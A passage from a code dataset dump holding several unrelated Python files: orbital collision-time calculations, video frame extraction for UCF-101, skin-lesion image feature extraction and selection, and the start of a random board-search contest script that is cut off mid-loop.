sin(I2)])\n dr = ((2 * Rbeam) * np.linalg.norm(np.cross(V1, V2))) / ((R ** 2.) * td1 * td2 * abs(sin(I2 - I1)))\n tinterval=0.5\n\n (Tp1, wp1) = TPrecess(a1, e1)\n (Tp2, wp2) = TPrecess(a2, e2)\n # up loop\n dr = [((2 * Rbeam) * np.linalg.norm(np.cross(V1, V2))) / ((R ** 2.) * td1 * td2 * abs(sin(I2 - I1))),0]\n dRplus=[0,0]\n y=0\n tplus=0\n while abs(dRplus[y])abs(abs(dRplus[(y+1)%2])-dr[(y+1)%2]): #if the previous was closer, go back\n tplus-=tinterval\n\n dRminus = [0, 0]\n dr = [((2 * Rbeam) * np.linalg.norm(np.cross(V1, V2))) / ((R ** 2.) 
* td1 * td2 * abs(sin(I2 - I1))), 0]\n y = 0\n tminus = 0\n while abs(dRminus[y]) < dr[y]:\n tminus -= tinterval\n y = (y + 1) % 2\n dRminus[y] = npr(a1, e1, C - s1i - (wp1 * tminus)) - npr(a2, e2, C - s2i - (\n wp2 * tminus))\n td1 = thetadot(a1, e1, C - s1i - (wp1 * tminus))\n rd1 = rdot(a1, e1, C - s1i - (wp1 * tminus))\n V1 = np.array([rd1, R * td1 * cos(I1), R * td1 * sin(I1)])\n td2 = thetadot(a2, e2, C - s2i - (\n wp2 * tminus))\n rd2 = rdot(a2, e2, C - s2i - (\n wp2 * tminus))\n V2 = np.array([rd2, R * td2 * cos(I2), R * td2 * sin(I2)])\n\n dr[y] = ((2 * Rbeam) * np.linalg.norm(np.cross(V1, V2))) / ((R ** 2.) * td1 * td2 * abs(sin(I2 - I1)))\n if abs(abs(dRminus[y]) - dr[y]) > abs(\n abs(dRminus[(y + 1) % 2]) - dr[(y + 1) % 2]): # if the previous was closer, go back\n tminus += tinterval\n '''\n dRminus = 0\n tminus = 0\n dr = ((2 * Rbeam) * np.linalg.norm(np.cross(V1, V2))) / ((R ** 2.) * td1 * td2 * abs(sin(I2 - I1)))\n while abs(dRminus) < dr:\n tminus -= tinterval\n dRminus = npr(a1, e1, C- s1i - (wp1 * tminus)) - npr(a2, e2, C - s2i - (\n wp2 * tminus)) # changed from plue to minus!\n td1 = thetadot(a1, e1, C - s1i - (wp1 * tplus))\n rd1 = rdot(a1, e1, C - s1i - (wp1 * tplus))\n V1 = np.array([rd1, R * td1 * cos(I1), R * td1 * sin(I1)])\n td2 = thetadot(a2, e2, C - s2i - (\n wp2 * tplus))\n rd2 = rdot(a2, e2, C - s2i - (\n wp2 * tplus))\n V2 = np.array([rd2, R * td2 * cos(I2), R * td2 * sin(I2)])\n\n dr = ((2 * Rbeam) * np.linalg.norm(np.cross(V1, V2))) / ((R ** 2.) * td1 * td2 * abs(sin(I2 - I1)))\n '''\n\n\n #print(tplus)\n #print(tminus)\n Tcontact=abs(tplus-tminus)\n dr = ((2 * Rbeam) * np.linalg.norm(np.cross(V1, V2))) / ((R ** 2.) * td1 * td2 * abs(sin(I2 - I1)))\n\n\n return [Tcontact,dr]\n\n\ndef TorGraph():\n N=int(1000)\n s1=0\n s2=np.linspace(0,2*pi,N)\n Data=np.zeros((3,N))#Rcol,Tcont,tor\n for i in range(1,N):\n [Data[0,i],Data[1,i]]=RcolwoATcontact(0,s2[i],'b')\n Data[2,i]=Data[0,i]*Data[1,i]*1e17\n\n plt.figure()\n plt.semilogy(s2[1:N-1],Data[0,1:N-1],label='Rcol')\n plt.xlabel('Lambda')\n plt.ylabel('Rcol')\n\n plt.figure()\n plt.semilogy(s2[1:N-1], Data[1, 1:N-1], label='Tcontact')\n plt.xlabel('Lambda')\n plt.ylabel('Tcontact, yrs')\n\n plt.figure()\n plt.semilogy(s2[1:N-1], Data[2, 1:N-1], label='Tor x 10^17')\n plt.xlabel('Lambda')\n plt.ylabel('Tor')\n return\n\ndef lambdatimeaverage(N):\n N=int(N)\n #N = int(1000)\n s1 = 0\n s2 = np.linspace(0, 2 * pi, N)\n Data = np.zeros((3, N)) # Rcol,Tcont,tor\n LambAv=0\n for i in range(1, N):\n [Data[0, i], Data[1, i]] = RcolwoATcontact(0, s2[i], 'b')\n Data[2, i] = Data[0, i] * Data[1, i]\n LambAv +=Data[2, i]\n [Data[0, i], Data[1, i]] = RcolwoATcontact(0, s2[i], 'a')\n Data[2, i] = Data[0, i] * Data[1, i]\n LambAv+=Data[2,i]\n\n Tpmin=min(Tp1,Tp2)\n LambAv = (LambAv / (2 * N))*(4/Tpmin)\n print(LambAv)\n\n return LambAv\n\ndef TcontactGraphs(N,rs1,rs2,pmod):\n N=int(N)\n Rbeam=100*1e3\n I1=0\n I2=10*(pi/180)\n\n (a1, e1) = orbitalvalues(rs1)\n (a2, e2) = orbitalvaluesmod(rs2, pmod)\n\n\n\n (Tp1, wp1) = TPrecess(a1, e1)\n (Tp2, wp2) = TPrecess(a2, e2)\n\n L = np.linspace(0, 2 * pi, N) # NOTE CHECK L def!! 
+ or - #s1-s2\n R = np.zeros((2, N)) # radial collision points\n C = np.zeros((2, N)) # theta collision point\n AB = ['a', 'b']\n # s\n\n for i in range(1, N):\n [[C[0, i], C[1, i]], [R[0, i], R[1, i]]] = CollisionPoints(a1, e1, 0, a2, e2, L[i])\n\n Rdot1 = rdot(a1, e1, C[:, :])\n Thetadot1 = thetadot(a1, e1, C[:, :])\n Rdot2 = rdot(a2, e2, C[:, :] - L)\n Thetadot2 = thetadot(a2, e2, C[:, :] - L)\n Vinc1 = np.zeros((2, 3, N))\n Vinc2 = np.zeros((2, 3, N))\n vrelpar = np.zeros((2, N))\n\n\n\n Tcontact= np.zeros((2, N))\n TcontactSecond = np.zeros((2, N))\n TcontSearch= np.zeros((2, N))\n Rcol= np.zeros((2, N))\n ProblemValue=np.zeros((2, N))\n dr=np.zeros((2, N))\n print('Calculating times...')\n for i in range(1, N - 1):\n #print(i,'/',N-2)\n for x in (0, 1):\n #MinTpr[x,i] = TPrAnalytic(OrbitdataVdata[x, 0, i], OrbitdataVdata[x, 1, i]) #Min\n\n #MaxTpr[x,i] = MinTpr[x,i] * dflr[x, i]*rfrag #Max\n [Rcol[x,i],Tcontact[x,i]]=RcolwoATcontact(a1,e1,a2,e2,0,L[i],AB[x],I1,I2,Rbeam)\n\n\n TcontactSecond[x, i] = RcolwoATcontactSecondOrder(a1, e1, a2, e2, 0, L[i], AB[x], I1, I2, Rbeam)[1]\n ProblemValue[x,i]=((Rdot1[x,i]/Thetadot1[x,i])*wp1)-((Rdot2[x,i]/Thetadot2[x,i])*wp2)\n [TcontSearch[x,i],dr[x,i]]=TcontactSearchMethod(a1, e1, a2, e2, 0, L[i], AB[x], I1, I2, Rbeam)\n\n print('plotting')\n for x in (0, 1):\n plt.figure()\n plt.title('Times at %s pts, rsource1=%s au, rsource2=%s au with pmod=%s' % (AB[x], rs1, rs2, pmod))\n plt.semilogy(L[1:N - 1] / pi, Tcontact[x, 1:N - 1], label='Contact time')\n plt.semilogy(L[1:N - 1] / pi, TcontactSecond[x, 1:N - 1], label='Second Order Contact time')\n plt.semilogy(L[1:N - 1] / pi, TcontSearch[x, 1:N - 1], label='Searched Tcont')\n plt.ylabel('Times, yrs')\n plt.xlabel('Lambda')\n plt.legend()\n '''\n plt.figure()\n plt.title('dr at %s pts, rsource1=%s au, rsource2=%s au with pmod=%s' % (AB[x], rs1, rs2, pmod))\n plt.semilogy(L[1:N - 1] / pi, dr[x, 1:N - 1], label='dr')\n plt.ylabel('dr, distance')\n plt.xlabel('Lambda')\n plt.legend()\n\n plt.figure()\n plt.title('ProbValue at %s pts, rsource1=%s au, rsource2=%s au with pmod=%s' % (AB[x], rs1, rs2, pmod))\n plt.semilogy(L[1:N - 1] / pi, abs(ProblemValue[x, 1:N - 1]), label='Prob Value')\n '''\n\n return\n\n\n\n\n#COMMANDS\n#[RColwoA,Tcontact]=RcolwoATcontact(0,3,'a')\n#print([RColwoA,Tcontact])\n#TorGraph()\n#lambdatimeaverage(1e4)\n\nTcontactGraphs(1e3,10,3,0.9)\nplt.show(), print('plotted')\n\n#3,10,0.9","repo_name":"TomMCallingham/SpaggetiAstro","sub_path":"Summer/Evolution/RcolTContact.py","file_name":"RcolTContact.py","file_ext":"py","file_size_in_byte":12249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41389419084","text":"import cv2 # for capturing videos\nimport numpy as np # efficient array operations\nimport pandas as pd\nimport gzip # efficient compression of numpy arrays \nfrom tqdm import tqdm\nimport os\n\ndef SaveVideoFrames(video_path, frames_array, f=10, max_frames=10, resize=(224, 224)):\n \"\"\"\n Extract frames from video file with certain frequency.\n\n Parameters\n ----------\n video_path : str\n Path of the video file to be extracted.\n frame_array_path : str\n Path to store the NumPy array of frames of the video file to.\n f : int\n Intervals at which the frames are to be extracted (default=10).\n max_frames : int\n The maximum no. 
of frames to be extracted.\n resize : tuple of pair of int\n The size to which frames should be resized\n \"\"\"\n\n count = 0\n frames = []\n zero_frame = np.zeros(shape=(resize[0], resize[1], 3))\n try:\n vidObj = cv2.VideoCapture(video_path)\n while len(frames) < max_frames:\n success, frame = vidObj.read()\n if success == False:\n while len(frames) < max_frames:\n frames.append(zero_frame)\n break\n count += 1\n if count%f > 0:\n continue\n frame = cv2.resize(frame, resize)\n frame = frame[:, :, [2, 1, 0]]\n frames.append(frame)\n vidObj.release()\n f = gzip.GzipFile(frames_array + \".npy.gz\", \"w\")\n np.save(f, np.array(frames))\n f.close()\n except:\n print(\"Extraction of \" + video_path + \" failed.\")\n\nvideos_path = \"./UCF-101\"\nannotations_path = \"./ucfTrainTestlist\"\n\nframes_path = \"./preprocessed\"\nos.makedirs(frames_path, exist_ok=True)\nprint(\"\\nFrames of video file will be extracted to: \" + frames_path)\n\nwith open(os.path.join(annotations_path, \"trainlist01.txt\")) as f:\n lines = f.readlines()\n train_df = [l.strip('\\n').split(maxsplit=1) for l in lines]\ntrain_df = pd.DataFrame(train_df, columns=[\"path\", \"label\"])\n\nprint(\"\\nExtracting frames from video files in train set...\\n\")\nfor idx in tqdm(range(len(train_df))):\n video = os.path.join(videos_path, train_df.iloc[idx][\"path\"])\n frames_array = os.path.join(frames_path, video.split('/')[-1].split('.avi')[0])\n SaveVideoFrames(video, frames_array, f=5, max_frames=10, resize=(224, 224))\nprint(\"\\nFrame extraction of train set complete!\")\n\ntrain_df['path'] = train_df['path'].apply(lambda x: os.path.join(frames_path, x.split('/')[-1].split('.avi')[0]+'.npy.gz'))\ntrain_df_path = \"./train.csv\"\ntrain_df.to_csv(train_df_path, index=False)\nprint(\"\\nTraining DataFrame saved as: \" + train_df_path)","repo_name":"mvedang/COMS-E6998-Project-Fall-2021","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10276193048","text":"# -*- coding: utf-8 -*-\n\"\"\"\nISM Project Part 1: features.py\n\nCreated on Mon Dez 3 10:49:12 2018\n\n@author: Sabljak\n\"\"\"\nimport numpy as np\nimport cv2\nimport os\nimport pandas as pd\nfrom PIL import Image, ImageOps\nfrom skimage import feature, img_as_ubyte, color\nfrom sklearn.feature_selection import SelectKBest, chi2\nfrom sklearn.preprocessing import MinMaxScaler, scale\nfrom sklearn.svm import LinearSVC\nfrom sklearn.feature_selection import SelectFromModel\n\n\nclass Features:\n\n \"\"\"Feature Extraction, Selection and Preparation\"\"\"\n def __init__(self, im_path, data_path, dev_set_path, feature_path=None, test_set=False):\n self.im_path = im_path\n self.data_path = data_path\n self.feature_path = feature_path\n self.dev_set_path = dev_set_path\n self.test_set = test_set\n self.img = []\n self.im2 = []\n self.data = []\n self.class_names = ['mel', 'nv', 'bcc', 'akiec', 'bkl', 'df', 'vasc']\n self.classes = []\n self.train_classes = []\n self.dev_classes = []\n self.feature_names = []\n self.features = []\n self.train_features = []\n self.dev_features = []\n self.test_data = []\n self.test_features = []\n\n def load_data(self):\n # Feature Extraction of Test Data\n if self.test_set is True and self.feature_path is None:\n # get names of test images\n data = sorted([os.path.splitext(f)[0] for f in os.listdir(self.im_path) if not f.startswith('.')])\n self.data = pd.DataFrame(data, 
columns=['image_id'])\n # open images, equalize histogram, then save to list of numpy arrays\n for i in range(0, self.data.shape[0]):\n im = Image.open(self.im_path + self.data.image_id[i] + '.jpg')\n im.load()\n # im_hist = ImageOps.equalize(im)\n # append to list\n # TODO: rechange\n self.img.append(np.asarray(im))\n\n self.features = pd.DataFrame(index=range(self.data.__len__()))\n\n # Feature Extraction of Training Data\n else:\n self.data = pd.read_csv(self.data_path)\n self.classes = self.data.dx\n\n if self.feature_path is None:\n # open images, equalize histogram, then save to list of numpy arrays\n for i in range(0, self.data.shape[0]):\n im = Image.open(self.im_path + self.data.image_id[i] + '.jpg')\n im.load()\n im_hist = ImageOps.equalize(im)\n # append to list\n self.img.append(np.asarray(im_hist))\n\n self.features = self.data.drop(['lesion_id', 'image_id', 'dx', 'dx_type', 'age', 'sex', 'localization'],\n axis=1)\n\n else:\n self.features = pd.read_csv(self.feature_path)\n self.test_data = pd.DataFrame(sorted([os.path.splitext(f)[0] for f in os.listdir(self.im_path)\n if not f.startswith('.')]), columns=['image_id'])\n self.test_features = pd.read_csv(self.test_set)\n\n \"\"\"Legendre Moments\"\"\"\n def lp(self, n, x):\n if n == 0:\n return 1\n elif n == 1:\n return x\n else:\n return ((2*n-1)*x*self.lp(n-1, x) - (n-1)*self.lp(n-2, x)) / n\n\n def beta(self, img, m, n):\n return (2 * m + 1) * (2 * n + 1) / (img.shape[0] * img.shape[1])\n\n def xcoord(self, img, i):\n return ((2*i)/(img.shape[1]-1)) - 1\n\n def ycoord(self, img, j):\n return ((2*j)/(img.shape[0]-1)) - 1\n\n def legendre_moment(self, img, m, n):\n s = 0\n for y in range(img.shape[0]):\n for x in range(img.shape[1]):\n s += self.lp(n, self.ycoord(img, y)) * self.lp(m, self.xcoord(img, x)) * img[y, x]\n return self.beta(img, m, n) * s\n\n # moments for each colour channel\n def legendre_moments(self):\n # initialise feature vector\n for colour in \"RGB\":\n for p in range(3):\n for q in range(3):\n self.features['Moment_{0}_L{1}{2}'.format(colour, p, q)] = 'default'\n for i in range(0, self.data.shape[0]):\n im_id = self.data['image_id'][i]\n for p in range(3):\n for q in range(3):\n m = self.legendre_moment(self.img[i], p, q)\n self.features.loc[self.data['image_id'] == im_id, ['Moment_R_L{0}{1}'.format(p, q)]] = m[0]\n self.features.loc[self.data['image_id'] == im_id, ['Moment_G_L{0}{1}'.format(p, q)]] = m[1]\n self.features.loc[self.data['image_id'] == im_id, ['Moment_B_L{0}{1}'.format(p, q)]] = m[2]\n print(m)\n self.features.to_csv('features.csv', index=False)\n\n # moments of black-white images\n def legendre_moments_bw(self):\n for p in range(3):\n for q in range(3):\n self.features['Moment_L{0}{1}'.format(p, q)] = 'default'\n for i in range(0, self.data.shape[0]):\n im_id = self.data['image_id'][i]\n for p in range(3):\n for q in range(3):\n self.features.loc[self.data['image_id'] == im_id, ['Moment_L{0}{1}'.format(p, q)]] = \\\n self.legendre_moment(color.rgb2grey(self.img[i]), p, q)\n # self.features.to_csv('features.csv', index=False)\n\n \"\"\"textures\"\"\"\n def textures(self):\n self.features['contrast'] = 'default'\n self.features['dissimilarity'] = 'default'\n self.features['homogeneity'] = 'default'\n self.features['energy'] = 'default'\n self.features['correlation'] = 'default'\n\n for i in range(0, self.data.shape[0]):\n im_id = self.data['image_id'][i]\n\n grey_co_mat = feature.greycomatrix(img_as_ubyte(color.rgb2grey(self.img[i])), [2], [0], 256, symmetric=True,\n normed=True)\n\n 
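            # Note: feature.greycomatrix() builds a 256x256 grey-level
            # co-occurrence matrix counting how often intensity i occurs at
            # distance 2, angle 0 from intensity j. Each feature.greycoprops()
            # call below collapses that matrix into one scalar texture
            # statistic; greycoprops returns an array of shape
            # (n_distances, n_angles) -- here (1, 1) -- which pandas
            # broadcasts into the single selected DataFrame cell.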
self.features.loc[self.data['image_id'] == im_id, ['contrast']] = \\\n feature.greycoprops(grey_co_mat, prop='contrast')\n self.features.loc[self.data['image_id'] == im_id, ['dissimilarity']] = \\\n feature.greycoprops(grey_co_mat, prop='dissimilarity')\n self.features.loc[self.data['image_id'] == im_id, ['homogeneity']] = \\\n feature.greycoprops(grey_co_mat, prop='homogeneity')\n self.features.loc[self.data['image_id'] == im_id, ['energy']] = \\\n feature.greycoprops(grey_co_mat, prop='energy')\n self.features.loc[self.data['image_id'] == im_id, ['correlation']] = \\\n feature.greycoprops(grey_co_mat, prop='correlation')\n self.features.to_csv('features.csv', index=False)\n\n \"\"\"average colour\"\"\"\n def avr_colour(self):\n self.features['average_red'] = 'default'\n self.features['average_green'] = 'default'\n self.features['average_blue'] = 'default'\n\n for i in range(0, self.data.shape[0]):\n im_id = self.data['image_id'][i]\n\n # add average color information to dataframe\n average = self.img[i].mean(axis=0).mean(axis=0)\n\n self.features.loc[self.data['image_id'] == im_id, ['average_red']] = average[0]\n self.features.loc[self.data['image_id'] == im_id, ['average_green']] = average[1]\n self.features.loc[self.data['image_id'] == im_id, ['average_blue']] = average[2]\n self.features.to_csv('features.csv', index=False)\n\n \"\"\"histogram of oriented gradients\"\"\"\n def hist_grad(self):\n self.features['histo_grad'] = 'default'\n hog = []\n for i in range(0, self.data.shape[0]):\n feature.hog(image, orientations=8, pixels_per_cell=(ppc, ppc), cells_per_block=(4, 4), block_norm='L2',\n visualise=True)\n hog.append(feature.hog(color.rgb2grey(self.img[i]), block_norm='L2-Hys'))\n\n \"\"\"skin-lesion-detection opencv\"\"\"\n def skin_lesion(self):\n self.features['area'] = 'default'\n self.features['area_variance01'] = 'default'\n self.features['area_variance02'] = 'default'\n self.features['area_variance03'] = 'default'\n self.features['area_variance1'] = 'default'\n self.features['area_variance2'] = 'default'\n self.features['area_variance3'] = 'default'\n self.features['average_blue'] = 'default'\n self.features['average_blue2'] = 'default'\n self.features['average_green'] = 'default'\n self.features['average_green2'] = 'default'\n self.features['average_red'] = 'default'\n self.features['average_red2'] = 'default'\n self.features['contrast2'] = 'default'\n self.features['correlation2'] = 'default'\n self.features['dissimilarity2'] = 'default'\n self.features['energy2'] = 'default'\n self.features['homogeneity2'] = 'default'\n self.features['m01'] = 'default'\n self.features['m02'] = 'default'\n self.features['m03'] = 'default'\n self.features['m10'] = 'default'\n self.features['m11'] = 'default'\n self.features['m12'] = 'default'\n self.features['m20'] = 'default'\n self.features['m21'] = 'default'\n self.features['m30'] = 'default'\n self.features['mu02'] = 'default'\n self.features['mu03'] = 'default'\n self.features['mu11'] = 'default'\n self.features['mu12'] = 'default'\n self.features['mu20'] = 'default'\n self.features['mu21'] = 'default'\n self.features['nu03'] = 'default'\n self.features['nu12'] = 'default'\n self.features['nu20'] = 'default'\n self.features['nu21'] = 'default'\n self.features['nu30'] = 'default'\n self.features['perimeter'] = 'default'\n self.features['symmetry'] = 'default'\n\n for i in range(0, self.data.shape[0]):\n im_id = self.data['image_id'][i]\n\n hsv = cv2.cvtColor(self.img[i], cv2.COLOR_BGR2HSV)\n gray = cv2.cvtColor(self.img[i], 
cv2.COLOR_BGR2GRAY)\n blur = cv2.GaussianBlur(gray, (17, 17), 32)\n ret, thresh = cv2.threshold(blur, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)\n im2, contours, hierarchy = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n self.im2.append(im2)\n cnt = max(contours, key=cv2.contourArea)\n if len(cnt) > 4:\n ellipse = cv2.fitEllipse(cnt)\n x, y, w, h = cv2.boundingRect(cnt)\n area = hsv[int(y + (0.3 * h)):int(y + (0.8 * h)), int((0.2 * w) + x):int((0.7 * w) + x)]\n ellipse_cnt = cv2.ellipse2Poly((int(ellipse[0][0]), int(ellipse[0][1])),\n (int(ellipse[1][0]), int(ellipse[1][1])), int(ellipse[2]), 0, 360, 1)\n\n # add average color information\n mask = thresh > 0\n red_sum = np.multiply(self.img[i][:, :, 0], mask).sum()\n green_sum = np.multiply(self.img[i][:, :, 1], mask).sum()\n blue_sum = np.multiply(self.img[i][:, :, 2], mask).sum()\n area_sum = mask.sum()\n\n # texture information\n gCoMat = feature.greycomatrix(gray, [2], [0], 256, symmetric=True, normed=True)\n\n # color without segmentation\n average = self.img[i].mean(axis=0).mean(axis=0)\n\n # add perimeter, symmetry and area variance\n perimeter = cv2.arcLength(cnt, True)\n comp = cv2.matchShapes(cnt, ellipse_cnt, 1, 0.0)\n variance = cv2.meanStdDev(area)\n\n # add moment information to dataframe\n moments = cv2.moments(cnt, True)\n\n self.features.loc[self.data['image_id'] == im_id, ['contrast2']] = feature.greycoprops(gCoMat, prop='contrast')\n self.features.loc[self.data['image_id'] == im_id, ['dissimilarity2']] = feature.greycoprops(gCoMat, prop='dissimilarity')\n self.features.loc[self.data['image_id'] == im_id, ['homogeneity2']] = feature.greycoprops(gCoMat, prop='homogeneity')\n self.features.loc[self.data['image_id'] == im_id, ['energy2']] = feature.greycoprops(gCoMat, prop='energy')\n self.features.loc[self.data['image_id'] == im_id, ['correlation2']] = feature.greycoprops(gCoMat, prop='correlation'),\n self.features.loc[self.data['image_id'] == im_id, ['average_red']] = red_sum / area_sum\n self.features.loc[self.data['image_id'] == im_id, ['average_green']] = green_sum / area_sum\n self.features.loc[self.data['image_id'] == im_id, ['average_blue']] = blue_sum / area_sum\n self.features.loc[self.data['image_id'] == im_id, ['average_red2']] = average[0]\n self.features.loc[self.data['image_id'] == im_id, ['average_green2']] = average[1]\n self.features.loc[self.data['image_id'] == im_id, ['average_blue2']] = average[2]\n self.features.loc[self.data['image_id'] == im_id, ['perimeter']] = perimeter\n self.features.loc[self.data['image_id'] == im_id, ['symmetry']] = comp\n self.features.loc[self.data['image_id'] == im_id, ['area_variance1']] = variance[1][0][0]\n self.features.loc[self.data['image_id'] == im_id, ['area_variance2']] = variance[1][1][0]\n self.features.loc[self.data['image_id'] == im_id, ['area_variance3']] = variance[1][2][0]\n self.features.loc[self.data['image_id'] == im_id, ['area_variance01']] = variance[0][0][0]\n self.features.loc[self.data['image_id'] == im_id, ['area_variance02']] = variance[0][1][0]\n self.features.loc[self.data['image_id'] == im_id, ['area_variance03']] = variance[0][2][0]\n self.features.loc[self.data['image_id'] == im_id, ['area']] = moments['m00']\n self.features.loc[self.data['image_id'] == im_id, ['m10']] = moments['m10']\n self.features.loc[self.data['image_id'] == im_id, ['m01']] = moments['m01']\n self.features.loc[self.data['image_id'] == im_id, ['m20']] = moments['m20']\n self.features.loc[self.data['image_id'] == im_id, ['m11']] = 
moments['m11']\n self.features.loc[self.data['image_id'] == im_id, ['m02']] = moments['m02']\n self.features.loc[self.data['image_id'] == im_id, ['m30']] = moments['m30']\n self.features.loc[self.data['image_id'] == im_id, ['m21']] = moments['m21']\n self.features.loc[self.data['image_id'] == im_id, ['m12']] = moments['m12']\n self.features.loc[self.data['image_id'] == im_id, ['m03']] = moments['m03']\n self.features.loc[self.data['image_id'] == im_id, ['mu20']] = moments['mu20']\n self.features.loc[self.data['image_id'] == im_id, ['mu11']] = moments['mu11']\n self.features.loc[self.data['image_id'] == im_id, ['mu02']] = moments['mu02']\n self.features.loc[self.data['image_id'] == im_id, ['mu03']] = moments['mu03']\n self.features.loc[self.data['image_id'] == im_id, ['mu21']] = moments['mu21']\n self.features.loc[self.data['image_id'] == im_id, ['mu12']] = moments['mu12']\n self.features.loc[self.data['image_id'] == im_id, ['mu03']] = moments['mu03']\n self.features.loc[self.data['image_id'] == im_id, ['nu20']] = moments['nu20']\n self.features.loc[self.data['image_id'] == im_id, ['nu30']] = moments['nu30']\n self.features.loc[self.data['image_id'] == im_id, ['nu21']] = moments['nu21']\n self.features.loc[self.data['image_id'] == im_id, ['nu12']] = moments['nu12']\n self.features.loc[self.data['image_id'] == im_id, ['nu03']] = moments['nu03']\n\n self.features.to_csv('data/features_test_set2.csv', index=False)\n\n \"\"\"features selection\"\"\"\n def feature_selection(self):\n # select training and validation set\n dev_im_id = pd.read_csv(self.dev_set_path)\n dev_indices = self.data.image_id.isin(dev_im_id.image)[lambda x: x]\n train_indices = self.data.image_id.isin(dev_im_id.image)[lambda x: ~x]\n self.train_features = self.features.drop(dev_indices.index)\n self.train_classes = self.classes.drop(dev_indices.index)\n self.dev_features = self.features.drop(train_indices.index)\n self.dev_classes = self.classes.drop(train_indices.index)\n\n # drop NAN values\n \"\"\"\n nan_indices = self.features.isna().any(axis=1)[lambda x: x]\n train_nan_indices = self.train_features.isna().any(axis=1)[lambda x: x]\n dev_nan_indices = self.dev_features.isna().any(axis=1)[lambda x: x]\n self.features.dropna(inplace=True)\n self.classes.drop(nan_indices.index, axis=0, inplace=True)\n self.train_features.dropna(inplace=True)\n self.train_classes.drop(train_nan_indices.index, axis=0, inplace=True)\n self.dev_features.dropna(inplace=True)\n self.dev_classes.drop(dev_nan_indices.index, axis=0, inplace=True)\n \"\"\"\n\n # first method: select k=10 best features with chi2-test\n # problem: choose of k beforehand\n \"\"\"\n chi_selector = SelectKBest(chi2, k=15).fit(features_norm, self.classes)\n chi_support = chi_selector.get_support()\n chi_feature_names = self.features.loc[:, chi_support].columns.tolist()\n chi_drop_names = self.features.loc[:, chi_support].columns.tolist()\n chi_features = chi_selector.transform(features_norm)\n print(chi_features.shape[1], 'chi-selected features', chi_feature_names)\n \"\"\"\n\n # drop features correlated with hair\n \"\"\"\n tested with augmented hair \n im_path = 'data/HairTest/'\n data_path = 'data/HairTest/data.csv'\n feature_path = None\n dev_set_path = None\n \"\"\"\n self.features.drop(['Moment_R_L02', 'Moment_R_L11', 'Moment_R_L12', 'Moment_R_L22',\n 'Moment_G_L02', 'Moment_G_L11', 'Moment_G_L12', 'Moment_G_L22',\n 'Moment_B_L02', 'Moment_B_L11', 'Moment_B_L12', 'Moment_B_L22',\n 'contrast', 'perimeter', 'area',\n 'area_variance1', 'area_variance2', 
'area_variance3'], axis=1, inplace=True)\n\n # normalise features values\n features_norm = scale(MinMaxScaler().fit_transform(self.features))\n # other method: (L1)/L2-based feature selection with LinearSVC\n # use SVM as a sparse estimator to reduce dimensionality\n # reason: many of the estimated coefficients are zero\n # use C to control the sparsity: the smaller C the fewer features selected\n lsvc = LinearSVC(C=0.1, penalty=\"l2\", dual=False).fit(features_norm, np.ravel(self.classes))\n svc_selector = SelectFromModel(lsvc, prefit=True)\n svc_support = svc_selector.get_support()\n svc_feature_names = self.features.loc[:, svc_support].columns.tolist()\n svc_drop_names = self.features.loc[:, ~svc_support].columns.tolist()\n svc_features = svc_selector.transform(features_norm)\n print(svc_features.shape[1], 'svc-selected features: ', svc_feature_names)\n\n # according to what features to use, set self variables; here: scv_features\n self.features = svc_features\n self.train_features.drop(svc_drop_names, axis=1, inplace=True)\n self.train_features = scale(MinMaxScaler().fit_transform(self.train_features))\n self.dev_features.drop(svc_drop_names, axis=1, inplace=True)\n self.dev_features = scale(MinMaxScaler().fit_transform(self.dev_features))\n self.test_features.drop(svc_drop_names, axis=1, inplace=True)\n self.test_features = scale(MinMaxScaler().fit_transform(self.test_features))\n self.feature_names = svc_feature_names\n","repo_name":"ProjectSeminarISM/part1","sub_path":"features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":19806,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"25278118782","text":"import time\r\nimport random\r\nimport copy\r\n\r\nVISUALIZE = True\r\n\r\ndef main():\r\n t_start = time.time()\r\n T_LIMIT = 3.0\r\n buf = input()\r\n buflist = buf.split()\r\n N = int(buflist[0]) # = 500\r\n M = int(buflist[1]) # = 29\r\n L = int(buflist[2]) # = 300\r\n S = []\r\n for i in range(N):\r\n buf = input()\r\n S.append(buf)\r\n # board initialization\r\n board = []\r\n for i in range(M):\r\n board.append(list(\".\" * M))\r\n for i in range(M):\r\n for j in range(M):\r\n if i == 0 or i == M - 1 or j == 0 or j == M - 1:\r\n board[i][j] = \"#\"\r\n # try to find best board with random panel placement\r\n PANEL_LIST = [\"#\", \"D\", \"T\", \"L\", \"R\", \".\"]\r\n WALL_CHANCE = 0.000\r\n DOUBLE_CHANCE = 0.00 + WALL_CHANCE\r\n TRIPLE_CHANCE = 0.00 + DOUBLE_CHANCE\r\n LEFT_CHANCE = 0.00 + TRIPLE_CHANCE\r\n RIGHT_CHANCE = 0.00 + LEFT_CHANCE\r\n NOTHING_CHANCE = 1.0\r\n PROB_LIST = [WALL_CHANCE, DOUBLE_CHANCE, TRIPLE_CHANCE, LEFT_CHANCE, RIGHT_CHANCE, NOTHING_CHANCE]\r\n best_board = copy.deepcopy(board)\r\n best_score = simulate_board(board, M, S)\r\n while True:\r\n new_board = copy.deepcopy(board)\r\n # randomly place panel\r\n for i in range(1, M-1):\r\n for j in range(1, M-1):\r\n roll = random.random()\r\n for k, prob in enumerate(PROB_LIST):\r\n if roll < prob:\r\n new_board[i][j] = PANEL_LIST[k]\r\n break\r\n for i in range(M):\r\n for j in range(M):\r\n if (i == 1 or i == M - 2 or j == 1 or j == M - 2) and not (i == 0 or i == M - 1 or j == 0 or j == M - 1):\r\n roll = random.random()\r\n if roll < 1.0:\r\n new_board[i][j] = \"R\"\r\n # wall is not allowed on center\r\n if new_board[(M - 1) // 2][(M - 1) // 2] == \"#\":\r\n new_board[(M - 1) // 2][(M - 1) // 2] = \".\" # remove wall\r\n # simulate board\r\n score = simulate_board(new_board, M, S)\r\n # is score higher than the best one?\r\n if 
